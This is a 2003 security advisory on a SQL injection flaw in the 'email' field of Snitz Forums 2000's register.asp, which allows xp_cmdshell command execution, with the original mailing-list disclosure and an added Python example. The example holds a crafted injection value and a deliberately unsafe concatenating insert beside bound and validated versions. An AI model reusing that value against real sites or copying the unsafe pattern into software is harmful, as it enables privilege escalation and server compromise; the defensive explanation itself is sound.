SecurityTracker.com
Category:   Application (Forum/Board/Portal)  >   Snitz Forums
Vendors:   Snitz Communications
Snitz Forums 2000 Input Validation Flaw in 'register.asp' Permits SQL Command Injection
SecurityTracker Alert ID:  1006743
SecurityTracker URL:  http://securitytracker.com/id/1006743
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  May 12 2003
Impact:   Execution of arbitrary code via network, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 3.3.03
Description:   A vulnerability was reported in Snitz Forums 2000. A remote user can execute stored procedures and non-interactive operating system commands on the system.

It is reported that the 'register.asp' script does not validate user-supplied input in the 'email' variable. A remote user can submit a specially crafted value for this variable to execute stored procedures, including 'xp_cmdshell'. Through the xp_cmdshell procedure, a remote user can execute arbitrary, non-interactive commands on the system.

A demonstration exploit Perl script is included in the Source Message [it is Base64 encoded].
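
As an added illustration of the flaw class described above (not Snitz Forums code and not taken from the source message), the following Python example contrasts a registration insert that pastes the e-mail value into the SQL text with one that validates the value and binds it as a parameter. The table layout, function names and the crafted value are constructed for the example, and SQLite stands in for the forum's database, so stored procedures such as xp_cmdshell are not involved.

```python
import re
import sqlite3

# Constructed schema for illustration; not the Snitz Forums table layout.
SCHEMA = "CREATE TABLE members (name TEXT, email TEXT, m_level INTEGER)"

# Conservative allow-list for the e-mail field: no quotes, spaces or semicolons.
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]{1,64}@[A-Za-z0-9.-]{1,255}\.[A-Za-z]{2,}")

# Constructed input: the quote ends the string literal early, so the rest of
# the value is parsed as SQL instead of being stored as data.
CRAFTED = "x@example.com', 3) --"


def is_valid_email(value):
    return EMAIL_RE.fullmatch(value) is not None


def register_unsafe(db, name, email):
    """Flawed pattern: the e-mail value is concatenated into the SQL text."""
    db.execute("INSERT INTO members (name, email, m_level) "
               "VALUES ('" + name + "', '" + email + "', 1)")


def register_bound(db, name, email):
    """Parameter binding: the driver passes the value as data, never as SQL."""
    db.execute("INSERT INTO members (name, email, m_level) VALUES (?, ?, 1)",
               (name, email))


def register_safe(db, name, email):
    """Hardened pattern: reject malformed input, then bind what remains."""
    if not is_valid_email(email):
        raise ValueError("rejected e-mail value")
    register_bound(db, name, email)


def stored_row(register, email):
    """Register one user in a fresh database; return (email, m_level) or None."""
    db = sqlite3.connect(":memory:")
    db.execute(SCHEMA)
    try:
        register(db, "bob", email)
    except ValueError:
        return None
    return db.execute("SELECT email, m_level FROM members").fetchone()
```

With the concatenated statement the crafted value changes the stored `m_level`; with binding alone it is stored verbatim as an odd-looking address, and with validation it never reaches the database.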

Impact:   A remote user can execute stored procedures on the system. A remote user can execute arbitrary, non-interactive shell commands on the operating system.
Solution:   The vendor has issued a fixed version (3.4.03), available at:

http://forum.snitz.com/specs.asp

Vendor URL:  forum.snitz.com/
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  [VulnWatch] Snitz Forum 3.3.03 Remote Command Execution


[Moderator: This was inadvertently sent to "VulnDiscuss" instead of "VulnWatch"
over the weekend.]

Overview:
Snitz Forums 2000, one of the best ASP based bulletin board systems on
the market. Getting better every day! A complete board system (forum)
that allows the user access to a friendly and intuitive interface.
http://forum.snitz.com 

Problem Description: 
Snitz Forums 3.3.03 has an SQL injection vulnerability in its "register.asp"
page with its "Email" variable. Because "register.asp" doesn't check
user input, remote users can execute stored procedures (such as "xp_cmdshell")
to arbitrarily run non-interactive commands on the system. 

Vendor Notification: 
Vendor notified last month. This is a deprecated version and users should
upgrade immediately. 

Versions Affected: 
3.3.03 
Most likely earlier versions (not tested) 

Fix: 
Upgrade to 3.4.03, the latest version. 

Exploit: 
See attached proof-of-concept Perl exploit.



